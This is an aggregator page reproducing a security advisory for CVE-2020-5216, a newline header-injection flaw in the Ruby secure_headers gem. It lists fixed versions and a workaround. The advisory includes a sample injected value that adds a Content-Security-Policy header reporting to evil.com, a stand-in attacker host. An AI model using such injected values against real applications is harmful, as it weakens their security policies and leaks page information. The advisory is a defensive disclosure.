Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLXc5Nzgtcm1wZi1xbXdn
Limited header injection when using dynamic overrides with user input in RubyGems secure_headers
Impact
If user-supplied input was passed into append/override_content_security_policy_directives, a newline could be injected leading to limited header injection.
Upon seeing a newline in the header, rails will silently create a new Content-Security-Policy header with the remaining value of the original string. It will continue to create new headers for each newline.
e.g.
override_content_security_directives(script_src: ['mycdn.com', "\ninjected\n"])`
would result in
Content-Security-Policy: ... script-src: mycdn.com
Content-Security-Policy: injected
Content-Security-Policy: rest-of-the-header
CSP supports multiple headers and all policies must be satisfied for execution to occur, but a malicious value that reports the current page is fairly trivial:
override_content_security_directives(script_src: ["mycdn.com", "\ndefault-src 'none'; report-uri evil.com"])
Content-Security-Policy: ... script-src: mycdn.com
Content-Security-Policy: default-src 'none'; report-uri evil.com
Content-Security-Policy: rest-of-the-header
Patches
This has been fixed in 6.3.0, 5.2.0, and 3.9.0
Workarounds
override_content_security_policy_directives(:frame_src, [user_input.gsub("\n", " ")])
References
https://github.com/twitter/secure_headers/security/advisories/GHSA-xq52-rv6w-397c
The effect of multiple policies
For more information
If you have any questions or comments about this advisory:
- Open an issue in this repo
- DM us at @ndm on twitter
JSON: https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLXc5Nzgtcm1wZi1xbXdn
Source: GitHub Advisory Database
Origin: Unspecified
Severity: Moderate
Classification: General
Published: over 4 years ago
Updated: 12 months ago
CVSS Score: 4.4
CVSS vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:N
Identifiers: GHSA-w978-rmpf-qmwg, CVE-2020-5216
References:
- https://github.com/twitter/secure_headers/security/advisories/GHSA-w978-rmpf-qmwg
- https://github.com/twitter/secure_headers/commit/301695706f6a70517c2a90c6ef9b32178440a2d0
- https://nvd.nist.gov/vuln/detail/CVE-2020-5216
- https://github.com/rubysec/ruby-advisory-db/blob/master/gems/secure_headers/CVE-2020-5216.yml
- https://github.com/advisories/GHSA-w978-rmpf-qmwg
Blast Radius: 12.8
Affected Packages
rubygems:secure_headers
Dependent packages: 7Dependent repositories: 822
Downloads: 21,155,328 total
Affected Version Ranges: < 3.9.0, >= 5.0.0, < 5.2.0, >= 6.0.0, < 6.3.0
Fixed in: 3.9.0, 5.2.0, 6.3.0
All affected versions: 0.1.0, 0.1.1, 0.2.0, 0.2.1, 0.3.0, 0.4.0, 0.4.1, 0.4.2, 0.4.3, 0.5.0, 1.0.0, 1.1.0, 1.1.1, 1.2.0, 1.3.0, 1.3.1, 1.3.2, 1.3.3, 1.3.4, 1.4.0, 1.4.1, 2.0.0, 2.0.1, 2.0.2, 2.1.0, 2.2.0, 2.2.1, 2.2.2, 2.2.3, 2.2.4, 2.3.0, 2.4.0, 2.4.1, 2.4.2, 2.4.3, 2.4.4, 2.5.0, 2.5.1, 2.5.2, 2.5.3, 3.0.0, 3.0.1, 3.0.2, 3.0.3, 3.1.0, 3.1.1, 3.1.2, 3.2.0, 3.3.0, 3.3.1, 3.3.2, 3.4.0, 3.4.1, 3.5.0, 3.5.1, 3.6.0, 3.6.1, 3.6.2, 3.6.3, 3.6.4, 3.6.5, 3.6.6, 3.6.7, 3.7.0, 3.7.1, 3.7.2, 3.7.3, 3.7.4, 3.8.0, 5.0.1, 5.0.2, 5.0.3, 5.0.4, 5.0.5, 5.1.0, 6.0.0, 6.1.0, 6.1.1, 6.1.2, 6.2.0
All unaffected versions: 3.9.0, 4.0.0, 4.0.1, 4.0.2, 5.2.0, 6.3.0, 6.3.1, 6.3.2, 6.3.3, 6.3.4, 6.4.0, 6.5.0